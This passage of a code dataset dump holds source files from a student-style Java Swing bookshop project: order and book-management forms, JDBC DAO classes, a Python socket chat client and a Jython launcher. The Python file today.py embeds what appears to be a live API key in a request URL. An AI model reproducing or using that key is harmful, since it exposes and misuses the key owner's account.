PayForm();\n payForm.setVisible(true);\n\n }\n } else {\n JOptionPane.showMessageDialog(null, \"提示:订单创建失败\");\n }\n\n }\n\n// private void orderTableMouseClicked(MouseEvent e) {\n// if (e.getClickCount() == 2){\n// int row = ((JTable)e.getSource()).rowAtPoint(e.getPoint());\n//// int col = ((JTable)e.getSource()).columnAtPoint(e.getPoint());\n// if (row == orderTable.getSelectedRow()){\n//\n// JOptionPane.showMessageDialog(null,\"用户名不能更改\");\n// }\n// }\n//\n// }\n\n private void getRowData() {\n }\n\n private void initComponents() {\n // JFormDesigner - Component initialization - DO NOT MODIFY //GEN-BEGIN:initComponents\n scrollPane1 = new JScrollPane();\n orderTable = new JTable();\n button1 = new JButton();\n button2 = new JButton();\n\n //======== this ========\n Container contentPane = getContentPane();\n contentPane.setLayout(null);\n\n //======== scrollPane1 ========\n {\n\n //---- orderTable ----\n orderTable.setModel(new DefaultTableModel(\n new Object[][] {\n {\"\", null, \"\", null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n {null, null, null, null},\n },\n new String[] {\n \"ID\", \"userId\", \"\\u603b\\u4ef7\\u683c\", \"\\u72b6\\u6001\"\n }\n ) {\n boolean[] columnEditable = new boolean[] {\n false, false, false, false\n };\n @Override\n public boolean isCellEditable(int rowIndex, int columnIndex) {\n return columnEditable[columnIndex];\n }\n });\n orderTable.setFont(orderTable.getFont().deriveFont(orderTable.getFont().getSize() + 2f));\n scrollPane1.setViewportView(orderTable);\n }\n contentPane.add(scrollPane1);\n scrollPane1.setBounds(70, 65, 490, 250);\n\n //---- button1 ----\n button1.setText(\"\\u7ed3\\u7b97\");\n button1.addActionListener(e -> button1ActionPerformed(e));\n contentPane.add(button1);\n button1.setBounds(new Rectangle(new Point(490, 335), button1.getPreferredSize()));\n contentPane.add(button2);\n button2.setBounds(new Rectangle(new Point(85, 335), button2.getPreferredSize()));\n\n { // compute preferred size\n Dimension preferredSize = new Dimension();\n for(int i = 0; i < contentPane.getComponentCount(); i++) {\n Rectangle bounds = contentPane.getComponent(i).getBounds();\n preferredSize.width = Math.max(bounds.x + bounds.width, preferredSize.width);\n preferredSize.height = Math.max(bounds.y + bounds.height, preferredSize.height);\n }\n Insets insets = contentPane.getInsets();\n preferredSize.width += insets.right;\n preferredSize.height += insets.bottom;\n contentPane.setMinimumSize(preferredSize);\n contentPane.setPreferredSize(preferredSize);\n }\n pack();\n setLocationRelativeTo(getOwner());\n // JFormDesigner - End of component initialization //GEN-END:initComponents\n }\n\n // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables\n private JScrollPane scrollPane1;\n private JTable orderTable;\n private JButton button1;\n private JButton button2;\n // JFormDesigner - End of variables declaration //GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.6829897165298462,
"alphanum_fraction": 0.6829897165298462,
"avg_line_length": 16.636363983154297,
"blob_id": "91e6b73482840fa6a18c7d0b959953b5c0d09d00",
"content_id": "50f27b2d25063155bfc99bedffd762fa4512f8a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 388,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 22,
"path": "/src/com/bookshop/dao/OrderItemDao.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.dao;\n\nimport java.util.List;\n\nimport com.bookshop.entity.OrderItem;\n\npublic interface OrderItemDao {\n // insert\n int insert(OrderItem orderItem);\n\n // delete\n int delete(Integer id);\n\n // update\n int update(OrderItem orderItem);\n\n // queryAll\n List<OrderItem> queryAll();\n\n // queryById\n List<OrderItem> queryByUserId(Integer userId);\n}\n"
},
{
"alpha_fraction": 0.6574307084083557,
"alphanum_fraction": 0.7279596924781799,
"avg_line_length": 43.11111068725586,
"blob_id": "895af87b33a4a803c8aa012cfc90f2fc748c56e5",
"content_id": "d945342de321bb3348ba4bb78853f1a4e249b1ff",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 413,
"license_type": "no_license",
"max_line_length": 188,
"num_lines": 9,
"path": "/charrobot/DEMO01/CS1/today.py",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "import requests\nimport json\n\n\ndef toDay(keyword):\n res = requests.get(\"https://api.apishop.net/common/disease/queryDiseaseListByKeyword?apiKey=YSs5jjub4a018d7adcad9af604bb809cc5709358db49cc8&page=1&pageSize=15&keyword=\"+keyword).json()\n alias=(\"病的种类:\"+\",\".join(res['result']['diseaseList'][0]['alias'])+\"\\n病的症状:\"+\"\".join(res['result']['diseaseList'][0][\"typicalSymptom\"]))\n\n return alias\n"
},
{
"alpha_fraction": 0.5213856101036072,
"alphanum_fraction": 0.5615125298500061,
"avg_line_length": 40.55769348144531,
"blob_id": "211d5ba49137809c79a7cf5d397fa83f4cb3bb55",
"content_id": "ed0ef48830352355d456a2609e43fb955d1d8b7c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 15691,
"license_type": "no_license",
"max_line_length": 236,
"num_lines": 364,
"path": "/src/com/bookshop/ui/AdminForm/CommodityManagementForm.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "/*\n * Created by JFormDesigner on Sat Jul 04 10:07:55 CST 2020\n */\n\npackage com.bookshop.ui.AdminForm;\n\nimport java.awt.event.*;\n\nimport com.bookshop.entity.Book;\nimport com.bookshop.service.BookService;\nimport com.bookshop.service.impl.BookServiceImpl;\nimport com.bookshop.util.UserData;\n\nimport java.awt.*;\nimport java.sql.Date;\nimport java.util.List;\nimport javax.swing.*;\nimport javax.swing.table.*;\n\n/**\n * @author °Ëµã°ë\n */\npublic class CommodityManagementForm extends JFrame {\n\n public static void main(String[] args) {\n CommodityManagementForm commodityManagementForm = new CommodityManagementForm();\n commodityManagementForm.setVisible(true);\n\n }\n\n public BookService bookService = new BookServiceImpl();\n\n public CommodityManagementForm() {\n initComponents();\n }\n\n public String[][] selectBook() {\n List<Book> books;\n Object selectedItem = selectBomboBox1.getSelectedItem();\n String text = textField1.getText();\n if (selectedItem.equals(\"书名\")) {\n books = bookService.queryByName(text);\n\n } else {\n books = bookService.queryAll();\n }\n\n String[][] datas = new String[books.size()][11];\n for (int i = 0; i < books.size(); i++) {\n datas[i][0] = books.get(i).getId().toString();\n datas[i][1] = books.get(i).getName();\n datas[i][2] = books.get(i).getAuthor();\n datas[i][3] = books.get(i).getPublisher();\n datas[i][4] = books.get(i).getPrice().toString();\n datas[i][5] = books.get(i).getType();\n datas[i][6] = books.get(i).getDisc();\n datas[i][7] = books.get(i).getDiscount().toString();\n datas[i][8] = books.get(i).getStore().toString();\n datas[i][9] = books.get(i).getFlag().toString();\n datas[i][10] = books.get(i).getCreateTime();\n\n\n }\n return datas;\n\n }\n\n public void showData() {\n\n\n //---- table1 ----\n table1.setModel(new DefaultTableModel(\n selectBook(),\n new String[]{\n \"ID\", \"\\u4e66\\u540d\", \"\\u4f5c\\u8005\", \"\\u51fa\\u7248\\u793e\", \"\\u4ef7\\u683c\", \"\\u7c7b\\u578b\", \"\\u662f\\u5426\\u6709\\u5149\\u789f\", \"\\u6298\\u6263\", \"\\u5e93\\u5b58\", \"\\u662f\\u5426\\u4e0b\\u67b6\", \"\\u521b\\u5efa\\u65f6\\u95f4\"\n }\n ));\n bookScrollPane1.setViewportView(table1);\n\n }\n\n private void selectButton1ActionPerformed(ActionEvent e) {\n // TODO add your code here 查询\n showData();\n }\n\n private void updateButton2ActionPerformed(ActionEvent e) {\n // TODO add your code here\n// 修改书籍\n int index = table1.getSelectedRow();\n if (index != -1) {\n // 取得表格对象的数据模型\n TableModel model = table1.getModel();\n String name=\"未填\", author=\"未填\", pulisher=\"未填\", typeId=\"-1\", disc=\"无\", time=new Date(System.currentTimeMillis()).toString();\n int id=0,store=100, flage=1;\n double price=1000000, discount=1;\n try {\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n id = Integer.parseInt(model.getValueAt(index, 0).toString());\n name = (model.getValueAt(index, 1)).toString();\n author = (model.getValueAt(index, 2)).toString();\n pulisher = (model.getValueAt(index, 3)).toString() + \" \";\n price = Double.parseDouble(model.getValueAt(index, 4).toString());\n if (price<=0){\n JOptionPane.showMessageDialog(null, \"提示:价格不能小于0,自动设置为100000\");\n price =100000;\n }\n typeId = (model.getValueAt(index, 5).toString());\n disc=(model.getValueAt(index, 6).toString());\n discount = Double.parseDouble(model.getValueAt(index, 7).toString());\n if (discount>1||discount<0){\n JOptionPane.showMessageDialog(null, \"提示:折扣设置出错,自动设置为1\");\n discount =1;\n }\n store = Integer.parseInt(model.getValueAt(index, 8).toString());\n if (store<=0){\n JOptionPane.showMessageDialog(null, \"提示:库存不能小于0,自动设置为1\");\n store =1;\n }\n flage = Integer.parseInt(model.getValueAt(index, 9).toString());\n time=(model.getValueAt(index, 10).toString());\n } catch (Exception es) {\n es.printStackTrace();\n JOptionPane.showMessageDialog(null, \"提示:有选项没填,已经选择默认值\");\n }\n\n Book book1 = new Book(id, name, author, pulisher, price, typeId, disc, discount, store, flage, time);\n if (bookService.update(book1) > 0) {\n JOptionPane.showMessageDialog(null, \"提示:修改成功!\");\n } else {\n JOptionPane.showMessageDialog(null, \"提示:修改失败!\");\n }\n//\n\n\n } else {\n JOptionPane.showMessageDialog(null, \"提示:请选择ID!\");\n }\n showData();\n }\n\n private void button5ActionPerformed(ActionEvent e) {\n // TODO add your code here\n List<Book> books1;\n books1 = bookService.queryAll();\n\n String[][] datas = new String[books1.size()+1][11];\n for (int i = 0; i < books1.size(); i++) {\n datas[i][0] = books1.get(i).getId().toString();\n datas[i][1] = books1.get(i).getName();\n datas[i][2] = books1.get(i).getAuthor();\n datas[i][3] = books1.get(i).getPublisher();\n datas[i][4] = books1.get(i).getPrice().toString();\n datas[i][5] = books1.get(i).getType();\n datas[i][6] = books1.get(i).getDisc();\n datas[i][7] = books1.get(i).getDiscount().toString();\n datas[i][8] = books1.get(i).getStore().toString();\n datas[i][9] = books1.get(i).getFlag().toString();\n datas[i][10] = books1.get(i).getCreateTime();\n\n\n }\n //---- table1 ----\n table1.setModel(new DefaultTableModel(\n datas,\n new String[]{\n \"ID\", \"\\u4e66\\u540d\", \"\\u4f5c\\u8005\", \"\\u51fa\\u7248\\u793e\", \"\\u4ef7\\u683c\", \"\\u7c7b\\u578b\", \"\\u662f\\u5426\\u6709\\u5149\\u789f\", \"\\u6298\\u6263\", \"\\u5e93\\u5b58\", \"\\u662f\\u5426\\u4e0b\\u67b6\", \"\\u521b\\u5efa\\u65f6\\u95f4\"\n }\n ));\n bookScrollPane1.setViewportView(table1);\n }\n\n private void button3ActionPerformed(ActionEvent e) {\n // TODO add your code here\n// 增加书籍\n\n int index = table1.getSelectedRow();\n\n System.out.println(table1.getRowCount());\n\n // 取得表格对象的数据模型\n TableModel model = table1.getModel();\n String name = \"无\", author = \"\", pulisher = \"无\", typeId = \"-1\", disc = \"无\", time = new Date(System.currentTimeMillis()).toString();\n ;\n int store = 100, flage = 1;\n double price = 100000, discount = 1;\n if (index!=-1) {\n try {\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n\n name = (model.getValueAt(index, 1)).toString();\n author = (model.getValueAt(index, 2)).toString();\n pulisher = (model.getValueAt(index, 3)).toString() + \" \";\n price = Double.parseDouble(model.getValueAt(index, 4).toString());\n typeId = (model.getValueAt(index, 5).toString());\n disc = (model.getValueAt(index, 6).toString());\n discount = Double.parseDouble(model.getValueAt(index, 7).toString());\n store = Integer.parseInt(model.getValueAt(index, 8).toString());\n flage = Integer.parseInt(model.getValueAt(index, 9).toString());\n time = (model.getValueAt(index, 10).toString());\n } catch (Exception es) {\n JOptionPane.showMessageDialog(null, \"提示:有选项没填,已经选择默认值\");\n }\n Book book1 = new Book(name, author, pulisher, price, typeId, disc, discount, store, flage, time);\n if (bookService.insert(book1) > 0) {\n JOptionPane.showMessageDialog(null, \"提示:添加成功!\");\n } else {\n JOptionPane.showMessageDialog(null, \"提示:添加失败!\");\n }\n }else {\n JOptionPane.showMessageDialog(null, \"提示:请选择添加行!\");\n }\n showData();\n\n\n }\n private void button4ActionPerformed(ActionEvent e) {\n // TODO add your code here\n// 删除\n\n int[] selectedRows = table1.getSelectedRows();\n if (selectedRows.length > 0) {\n for (int index = 0; index < selectedRows.length; index++) {\n // 取得表格对象的数据模型\n TableModel model = table1.getModel();\n // 在表格对象模型中,根据选中的行和列,获取相应的数据值\n int id = Integer.parseInt(model.getValueAt(selectedRows[index], 0).toString());\n bookService.delete(id);\n\n }\n JOptionPane.showMessageDialog(null, \"提示:删除成功!\");\n }else {\n JOptionPane.showMessageDialog(null, \"提示:删除失败!\");\n JOptionPane.showMessageDialog(null, \"提示:请选择ID!\");\n }\n\n showData();\n\n\n }\n\n\n private void initComponents() {\n // JFormDesigner - Component initialization - DO NOT MODIFY //GEN-BEGIN:initComponents\n bookScrollPane1 = new JScrollPane();\n table1 = new JTable();\n selectButton1 = new JButton();\n updateButton2 = new JButton();\n button3 = new JButton();\n button4 = new JButton();\n selectBomboBox1 = new JComboBox<>();\n textField1 = new JTextField();\n button5 = new JButton();\n\n //======== this ========\n setTitle(\"\\u4e66\\u672c\\u7ba1\\u7406\");\n setBackground(SystemColor.inactiveCaptionBorder);\n Container contentPane = getContentPane();\n contentPane.setLayout(null);\n\n //======== bookScrollPane1 ========\n {\n\n //---- table1 ----\n table1.setModel(new DefaultTableModel(\n new Object[][] {\n {null, null, \"\", null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n {null, null, null, null, null, null, null, null, null, null, null},\n },\n new String[] {\n \"ID\", \"\\u4e66\\u540d\", \"\\u4f5c\\u8005\", \"\\u51fa\\u7248\\u793e\", \"\\u4ef7\\u683c\", \"\\u7c7b\\u578b\", \"\\u662f\\u5426\\u6709\\u5149\\u789f\", \"\\u6298\\u6263\", \"\\u5e93\\u5b58\", \"\\u662f\\u5426\\u4e0b\\u67b6\", \"\\u521b\\u5efa\\u65f6\\u95f4\"\n }\n ) {\n Class<?>[] columnTypes = new Class<?>[] {\n Integer.class, Object.class, Object.class, Object.class, Object.class, Object.class, Object.class, Object.class, Object.class, Object.class, Object.class\n };\n @Override\n public Class<?> getColumnClass(int columnIndex) {\n return columnTypes[columnIndex];\n }\n });\n bookScrollPane1.setViewportView(table1);\n }\n contentPane.add(bookScrollPane1);\n bookScrollPane1.setBounds(10, 40, 760, 370);\n\n //---- selectButton1 ----\n selectButton1.setText(\"\\u67e5\\u8be2\");\n selectButton1.addActionListener(e -> selectButton1ActionPerformed(e));\n contentPane.add(selectButton1);\n selectButton1.setBounds(new Rectangle(new Point(310, 430), selectButton1.getPreferredSize()));\n\n //---- updateButton2 ----\n updateButton2.setText(\"\\u4fee\\u6539\");\n updateButton2.addActionListener(e -> updateButton2ActionPerformed(e));\n contentPane.add(updateButton2);\n updateButton2.setBounds(new Rectangle(new Point(430, 430), updateButton2.getPreferredSize()));\n\n //---- button3 ----\n button3.setText(\"\\u589e\\u52a0\\u56fe\\u4e66\");\n button3.addActionListener(e -> button3ActionPerformed(e));\n contentPane.add(button3);\n button3.setBounds(new Rectangle(new Point(545, 430), button3.getPreferredSize()));\n\n //---- button4 ----\n button4.setText(\"\\u5220\\u9664\");\n button4.addActionListener(e -> button4ActionPerformed(e));\n contentPane.add(button4);\n button4.setBounds(new Rectangle(new Point(660, 430), button4.getPreferredSize()));\n\n //---- selectBomboBox1 ----\n selectBomboBox1.setModel(new DefaultComboBoxModel<>(new String[] {\n \"\\u4e66\\u540d\",\n \"\\u4f5c\\u8005\",\n \"\\u4ef7\\u683c\"\n }));\n contentPane.add(selectBomboBox1);\n selectBomboBox1.setBounds(new Rectangle(new Point(65, 425), selectBomboBox1.getPreferredSize()));\n contentPane.add(textField1);\n textField1.setBounds(170, 435, 115, textField1.getPreferredSize().height);\n\n //---- button5 ----\n button5.setText(\"+\");\n button5.setFont(button5.getFont().deriveFont(button5.getFont().getSize() + 8f));\n button5.setForeground(Color.black);\n button5.setBackground(Color.white);\n button5.addActionListener(e -> button5ActionPerformed(e));\n contentPane.add(button5);\n button5.setBounds(new Rectangle(new Point(10, 10), button5.getPreferredSize()));\n\n contentPane.setPreferredSize(new Dimension(790, 520));\n pack();\n setLocationRelativeTo(getOwner());\n // JFormDesigner - End of component initialization //GEN-END:initComponents\n }\n\n // JFormDesigner - Variables declaration - DO NOT MODIFY //GEN-BEGIN:variables\n private JScrollPane bookScrollPane1;\n private JTable table1;\n private JButton selectButton1;\n private JButton updateButton2;\n private JButton button3;\n private JButton button4;\n private JComboBox<String> selectBomboBox1;\n private JTextField textField1;\n private JButton button5;\n // JFormDesigner - End of variables declaration //GEN-END:variables\n}\n"
},
{
"alpha_fraction": 0.5413785576820374,
"alphanum_fraction": 0.5490742921829224,
"avg_line_length": 35.29959487915039,
"blob_id": "4d2574691fdc113ac23e4e3ca7dffacb5b651614",
"content_id": "7f2247abd0fd34acf841d258b07e6fe28569923b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 9122,
"license_type": "no_license",
"max_line_length": 198,
"num_lines": 247,
"path": "/src/com/bookshop/dao/impl/BookDaoImpl.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.dao.impl;\n\nimport java.sql.Connection;\nimport java.sql.PreparedStatement;\nimport java.sql.ResultSet;\nimport java.sql.SQLException;\nimport java.util.ArrayList;\nimport java.util.List;\n\nimport com.bookshop.dao.BookDao;\nimport com.bookshop.entity.Book;\nimport com.bookshop.util.JDBCUtils;\n\npublic class BookDaoImpl implements BookDao {\n\n @Override\n public int insert(Book book) {\n String sql = \"INSERT INTO `Book` (`name`, `author`, `publisher`, `price`, `type_id`, `disc`, `discount`, `store`, `flag`, `create_time`) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\";\n // 获取连接\n Connection connection = JDBCUtils.getConnection();\n // 语句执行平台\n PreparedStatement preparedStatement = null;\n // 记录受影响的行数\n int result = 0;\n try {\n // 获得预编译对象后\n preparedStatement = connection.prepareStatement(sql);\n // 给?赋值\n preparedStatement.setString(1, book.getName());\n preparedStatement.setString(2, book.getAuthor());\n preparedStatement.setString(3, book.getPublisher());\n preparedStatement.setDouble(4, book.getPrice());\n preparedStatement.setString(5, book.getType());\n preparedStatement.setString(6, book.getDisc());\n preparedStatement.setDouble(7, book.getDiscount());\n preparedStatement.setInt(8, book.getStore());\n preparedStatement.setInt(9, book.getFlag());\n preparedStatement.setString(10, book.getCreateTime());\n // 执行sql语句 DML\n result = preparedStatement.executeUpdate();\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n // 资源的关闭\n try {\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n // 对结果的处理\n return result;\n }\n\n @Override\n public int delete(Integer id) {\n // ?代表占位符\n // DML 数据操纵语言\n // DQL 数据查询语言 SELECT\n // DDL 数据定义语言 表结构\n // DCL 数据控制语言 权限\n String sql = \"DELETE FROM `Book` WHERE `id` = ?\";\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n int result = 0;\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setLong(1, id);\n result = preparedStatement.executeUpdate();\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return result;\n }\n\n\n\n @Override\n public int update(Book book) {\n\n\n String sql = \"UPDATE `book` SET `name` = ?, `author` = ?, `publisher` = ?, `price` = ?, `type_id` = ?, `disc` = ?, `discount` = ?, `store` = ?, `flag` = ?, `create_time` = ? WHERE `id` = ?\";\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n int result = 0;\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setString(1, book.getName());\n preparedStatement.setString(2, book.getAuthor());\n preparedStatement.setString(3, book.getPublisher());\n preparedStatement.setDouble(4, book.getPrice());\n preparedStatement.setString(5, book.getType());\n preparedStatement.setString(6, book.getDisc());\n preparedStatement.setDouble(7, book.getDiscount());\n preparedStatement.setInt(8, book.getStore());\n preparedStatement.setInt(9, book.getFlag());\n preparedStatement.setString(10, book.getCreateTime());\n preparedStatement.setInt(11, book.getId());\n\n result = preparedStatement.executeUpdate();\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n\n return result;\n }\n\n @Override\n public List<Book> queryAll() {\n // DQL:Connection PreparedStatement ResultSet\n String sql = \"SELECT * FROM `book`\";\n List<Book> list = new ArrayList<Book>();\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n ResultSet resultSet = null;\n\n try {\n preparedStatement = connection.prepareStatement(sql);\n resultSet = preparedStatement.executeQuery();\n\n while (resultSet.next()) {\n Book book = new Book();\n book.setId(resultSet.getInt(1));\n book.setName(resultSet.getString(2));\n book.setAuthor(resultSet.getString(3));\n book.setPublisher(resultSet.getString(4));\n book.setPrice(resultSet.getDouble(5));\n book.setType(resultSet.getString(6));\n book.setDisc(resultSet.getString(7));\n book.setDiscount(resultSet.getDouble(8));\n book.setStore(resultSet.getInt(9));\n book.setFlag(resultSet.getInt(10));\n book.setCreateTime(resultSet.getString(11));\n list.add(book);\n }\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n resultSet.close();\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return list;\n }\n\n @Override\n public Book queryById(Integer id) {\n String sql = \"SELECT * FROM `book` WHERE `id` = ?\";\n Book book = new Book();\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n ResultSet resultSet = null;\n\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setLong(1, id);\n resultSet = preparedStatement.executeQuery();\n\n if (resultSet.next()) {\n book.setId(resultSet.getInt(1));\n book.setName(resultSet.getString(2));\n book.setAuthor(resultSet.getString(3));\n book.setPublisher(resultSet.getString(4));\n book.setPrice(resultSet.getDouble(5));\n book.setType(resultSet.getString(6));\n book.setDisc(resultSet.getString(7));\n book.setDiscount(resultSet.getDouble(8));\n book.setStore(resultSet.getInt(9));\n book.setFlag(resultSet.getInt(10));\n book.setCreateTime(resultSet.getString(11));\n }\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n resultSet.close();\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return book;\n }\n\n @Override\n public List<Book> queryByName(String name) {\n String sql = \"SELECT * FROM `Book` WHERE `name` LIKE ? \";\n List<Book> list = new ArrayList<Book>();\n Connection connection = JDBCUtils.getConnection();\n PreparedStatement preparedStatement = null;\n ResultSet resultSet = null;\n\n try {\n preparedStatement = connection.prepareStatement(sql);\n preparedStatement.setString(1, \"%\"+name+\"%\");\n resultSet = preparedStatement.executeQuery();\n\n while (resultSet.next()) {\n Book book = new Book();\n book.setId(resultSet.getInt(1));\n book.setName(resultSet.getString(2));\n book.setAuthor(resultSet.getString(3));\n book.setPublisher(resultSet.getString(4));\n book.setPrice(resultSet.getDouble(5));\n book.setType(resultSet.getString(6));\n book.setDisc(resultSet.getString(7));\n book.setDiscount(resultSet.getDouble(8));\n book.setStore(resultSet.getInt(9));\n book.setFlag(resultSet.getInt(10));\n book.setCreateTime(resultSet.getString(11));\n list.add(book);\n }\n } catch (SQLException e) {\n e.printStackTrace();\n } finally {\n try {\n resultSet.close();\n preparedStatement.close();\n connection.close();\n } catch (SQLException e) {\n e.printStackTrace();\n }\n }\n return list;\n }\n\n}\n"
},
{
"alpha_fraction": 0.41272902488708496,
"alphanum_fraction": 0.4484088718891144,
"avg_line_length": 29.52941131591797,
"blob_id": "8f4b0565637f5c7ee21fd407d5e05a4af868631c",
"content_id": "67dafad6892a749e2a28559cca3f00a5b3b4e0ca",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1149,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 34,
"path": "/charrobot/DEMO01/CS1/client.py",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "import socket # 导入 socket 模块\n\n# 客户端\ndef client():\n s = socket.socket() # 创建 socket 对象\n s.connect(('127.0.0.1', 8715))\n print(\"成功连接服务端,请选择服务\")\n\n while True:\n print(\"1,聊天机器人,2.中文分词,3.情感分析,4.退出\")\n target=input()\n if target==\"4\":\n return\n if target==\"1\":\n while True:\n print(\"请输一句话,输入quit结束聊天\")\n city=input()\n if city==\"quit\":\n break\n target=target+\"===\"+city\n s.send(target.encode('utf8'))\n print(s.recv(1024).decode(encoding='utf8'))\n target=\"1\"\n if target == \"2\":\n print(\"请输入一句话\")\n data = input()\n target = target + \"===\" + data\n s.send(target.encode('utf8'))\n print(s.recv(2048).decode(encoding='utf8'))\n if target == \"3\":\n s.send(target.encode('utf8'))\n print(s.recv(1024).decode(encoding='utf8'))\nif __name__ == '__main__':\n client()"
},
{
"alpha_fraction": 0.5368821024894714,
"alphanum_fraction": 0.5437262654304504,
"avg_line_length": 22.464284896850586,
"blob_id": "a06f719301ade199cd8249057a366bc85a83479c",
"content_id": "ae089280f3c46dbf78bb78fdb79d984e3bd429ac",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1355,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 56,
"path": "/src/com/bookshop/util/Recevice.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.util;\n\n\nimport com.bookshop.ui.userForm.TestIdea;\n\nimport java.io.DataInputStream;\nimport java.io.IOException;\nimport java.net.Socket;\n\npublic class Recevice implements Runnable {\n\n //负责读取服务端发送过来的信息\n private DataInputStream is;\n //线程标识\n private boolean isRun = true;\n\n\n @Override\n public void run() {\n // TODO Auto-generated method stub\n while (isRun) {\n recevice();\n }\n }\n\n public Recevice(Socket client) {\n // TODO Auto-generated constructor stub\n try {\n is = new DataInputStream(client.getInputStream());\n } catch (IOException e) {\n // TODO Auto-generated catch block\n e.printStackTrace();\n CloseUtil.closeAll(is);\n isRun = false;\n }\n }\n\n public void recevice() {\n\n try {\n byte[] b = new byte[1024];\n int length = 0;\n while ((length = is.read(b)) != -1) {\n System.out.println(new String(b,0,length));\n TestIdea.textArea1.append(\"客服:\"+new String(b,0,length)+\"\\n\");\n }\n } catch (IOException e) {\n // TODO Auto-generated catch block\n e.printStackTrace();\n CloseUtil.closeAll(is);\n isRun = false;\n }\n\n }\n\n}\n\n"
},
{
"alpha_fraction": 0.5299785733222961,
"alphanum_fraction": 0.5353319048881531,
"avg_line_length": 32.28571319580078,
"blob_id": "7c540f087078be3e253f37831432fa77b807e2eb",
"content_id": "4fe8ae20c608683625cb080853545af37271d56a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 954,
"license_type": "no_license",
"max_line_length": 101,
"num_lines": 28,
"path": "/src/com/bookshop/util/JythonServer.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.util;\n\nimport java.io.BufferedReader;\nimport java.io.InputStreamReader;\n\npublic class JythonServer {\n\n public static void main(String[] args) {\n\n\n // TODO Auto-generated method stub\n String pyPath = \"I:\\\\BookShop\\\\BookShop\\\\charrobot\\\\DEMO01\\\\CS1\\\\server.py\"; //python文件路径\n\n String[] args1 = new String[] { \"H:\\\\编程\\\\charrobot\\\\venv\\\\Scripts\\\\python\", pyPath};\n try {\n Process proc = Runtime.getRuntime().exec(args1); //执行py文件\n BufferedReader in = new BufferedReader(new InputStreamReader(proc.getInputStream()));\n String line = null;\n while ((line = in.readLine()) != null) {\n System.out.println(line);\n }\n in.close();\n proc.waitFor();\n } catch (Exception e) {\n e.printStackTrace();\n }\n }\n }\n\n\n"
},
{
"alpha_fraction": 0.6092715263366699,
"alphanum_fraction": 0.6158940196037292,
"avg_line_length": 14.100000381469727,
"blob_id": "629621954099d892fb9c5bbeb3115ac5c967410d",
"content_id": "c37f9fbff43c8c5f4282a8e88958ff48fee602e6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 151,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 10,
"path": "/src/com/bookshop/test/Test1.java",
"repo_name": "lyh-git/bookshop",
"src_encoding": "UTF-8",
"text": "package com.bookshop.test;\n\nimport org.junit.Test;\n\npublic class Test1 {\n @Test\n public void test(){\n System.out.println(\"kkk\");\n }\n}\n"
},
{
"alpha_fraction": 0.6764252781867981,
"alphanum_fraction": 0.6764252781867981,
"avg_line_length": 20.633333206176758,
